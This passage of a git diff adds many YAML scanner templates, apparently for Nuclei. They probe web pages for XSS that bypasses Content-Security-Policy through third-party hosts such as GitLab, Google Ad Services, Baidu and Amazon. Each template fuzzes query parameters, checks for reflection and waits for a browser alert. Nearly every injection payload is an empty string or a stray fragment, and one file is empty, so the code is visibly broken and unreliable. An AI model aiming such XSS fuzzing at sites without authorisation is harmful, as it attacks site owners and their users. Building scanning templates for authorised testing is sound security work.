+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: nominatim_openstreetmap_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "nominatim_openstreetmap_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/oamssoqae-ieee-csp-xss.yaml b/dast/vulnerabilities/xss/csp/oamssoqae-ieee-csp-xss.yaml
new file mode 100644
index 00000000000..8b4cc510235
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/oamssoqae-ieee-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: oamssoqae-ieee-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via IEEE OAMSSOQAE
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ieee
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: oamssoqae_ieee_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "oamssoqae_ieee_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/olark-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/olark-api-csp-xss.yaml
new file mode 100644
index 00000000000..000ad906817
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/olark-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: olark-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Olark API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,olark
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: olark_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "olark_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/openexchangerates-csp-xss.yaml b/dast/vulnerabilities/xss/csp/openexchangerates-csp-xss.yaml
new file mode 100644
index 00000000000..8009fdea74b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/openexchangerates-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: openexchangerates-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via OpenExchangeRates
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,openexchangerates
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: openexchangerates_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "openexchangerates_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/page-gitlab-csp-xss.yaml b/dast/vulnerabilities/xss/csp/page-gitlab-csp-xss.yaml
new file mode 100644
index 00000000000..311b106b35f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/page-gitlab-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: page-gitlab-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via GitLab Page
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,gitlab
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: page_gitlab_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "page_gitlab_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/partner-googleadservices-csp-xss.yaml b/dast/vulnerabilities/xss/csp/partner-googleadservices-csp-xss.yaml
new file mode 100644
index 00000000000..80d2ad8eaf0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/partner-googleadservices-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: partner-googleadservices-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Ad Services
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: partner_googleadservices_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "partner_googleadservices_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/passport-baidu-csp-xss.yaml b/dast/vulnerabilities/xss/csp/passport-baidu-csp-xss.yaml
new file mode 100644
index 00000000000..b60606ee3e8
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/passport-baidu-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: passport-baidu-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Baidu Passport
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,baidu
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: passport_baidu_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "passport_baidu_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/pinterest-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pinterest-api-csp-xss.yaml
new file mode 100644
index 00000000000..bf5462ed712
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/pinterest-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: pinterest-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Pinterest API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,pinterest
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: pinterest_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "pinterest_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/pixel-mathtag-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pixel-mathtag-csp-xss.yaml
new file mode 100644
index 00000000000..dedd42b0a36
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/pixel-mathtag-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: pixel-mathtag-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Mathtag Pixel
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,mathtag
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: pixel_mathtag_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "pixel_mathtag_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/pixel-quantserve-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pixel-quantserve-csp-xss.yaml
new file mode 100644
index 00000000000..00be5aedfa1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/pixel-quantserve-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: pixel-quantserve-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Quantserve Pixel
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,quantserve
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: pixel_quantserve_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "pixel_quantserve_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/portal-ayco-csp-xss.yaml b/dast/vulnerabilities/xss/csp/portal-ayco-csp-xss.yaml
new file mode 100644
index 00000000000..0c692aaaf92
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/portal-ayco-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: portal-ayco-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Ayco Portal
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ayco
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
![](x)
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: portal_ayco_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "portal_ayco_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/pubads-doubleclick-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pubads-doubleclick-csp-xss.yaml
new file mode 100644
index 00000000000..26b426bd4a0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/pubads-doubleclick-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: pubads-doubleclick-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via DoubleClick PubAds
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,doubleclick
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: pubads_doubleclick_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "pubads_doubleclick_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/public-api-wordpress-csp-xss.yaml b/dast/vulnerabilities/xss/csp/public-api-wordpress-csp-xss.yaml
new file mode 100644
index 00000000000..c811b857770
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/public-api-wordpress-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: public-api-wordpress-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via WordPress Public API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,wordpress
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: public_api_wordpress_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "public_api_wordpress_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/qq-c-y-csp-xss.yaml b/dast/vulnerabilities/xss/csp/qq-c-y-csp-xss.yaml
new file mode 100644
index 00000000000..3bb93b99944
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/qq-c-y-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: qq-c-y-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via QQ C.Y
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,qq
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: qq_c_y_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "qq_c_y_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/query-fqtag-csp-xss.yaml b/dast/vulnerabilities/xss/csp/query-fqtag-csp-xss.yaml
new file mode 100644
index 00000000000..9210b67e546
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/query-fqtag-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: query-fqtag-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via FQTag Query
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,fqtag
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: query_fqtag_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "query_fqtag_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/r-skimresources-csp-xss.yaml b/dast/vulnerabilities/xss/csp/r-skimresources-csp-xss.yaml
new file mode 100644
index 00000000000..fd7ebad2dca
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/r-skimresources-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: r-skimresources-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via SkimResources
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,skimresources
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: r_skimresources_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "r_skimresources_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml
new file mode 100644
index 00000000000..fe8581f1de9
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via IP-API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ip-api
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: raae2vza0snymz9cm3r8ix74bs71vdlz_edns_ip_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "raae2vza0snymz9cm3r8ix74bs71vdlz_edns_ip_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/recaptcha-net-csp-xss.yaml b/dast/vulnerabilities/xss/csp/recaptcha-net-csp-xss.yaml
new file mode 100644
index 00000000000..0519ecba6ea
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/recaptcha-net-csp-xss.yaml
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/rentokil-domains-firebaseio-csp-xss.yaml b/dast/vulnerabilities/xss/csp/rentokil-domains-firebaseio-csp-xss.yaml
new file mode 100644
index 00000000000..0606cf67b78
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/rentokil-domains-firebaseio-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: rentokil-domains-firebaseio-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Firebase Rentokil Domains
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,firebase
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: rentokil_domains_firebaseio_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "rentokil_domains_firebaseio_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/reveal-clearbit-csp-xss.yaml b/dast/vulnerabilities/xss/csp/reveal-clearbit-csp-xss.yaml
new file mode 100644
index 00000000000..25ede2d8606
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/reveal-clearbit-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: reveal-clearbit-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Clearbit Reveal
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,clearbit
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: reveal_clearbit_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "reveal_clearbit_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ring-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ring-csp-xss.yaml
new file mode 100644
index 00000000000..f6b4f605b0f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ring-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ring-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Ring
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ring
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: ring_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "ring_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/romania-amazon-csp-xss.yaml b/dast/vulnerabilities/xss/csp/romania-amazon-csp-xss.yaml
new file mode 100644
index 00000000000..726cd34ef8e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/romania-amazon-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: romania-amazon-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Amazon Romania
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,amazon
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: romania_amazon_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "romania_amazon_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/s-fqtag-csp-xss.yaml b/dast/vulnerabilities/xss/csp/s-fqtag-csp-xss.yaml
new file mode 100644
index 00000000000..40c30ccda79
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/s-fqtag-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: s-fqtag-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via FQTag S
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,fqtag
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: s_fqtag_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "s_fqtag_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/s-ytimg-csp-xss.yaml b/dast/vulnerabilities/xss/csp/s-ytimg-csp-xss.yaml
new file mode 100644
index 00000000000..b71a6aef785
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/s-ytimg-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: s-ytimg-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via YTImg S
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
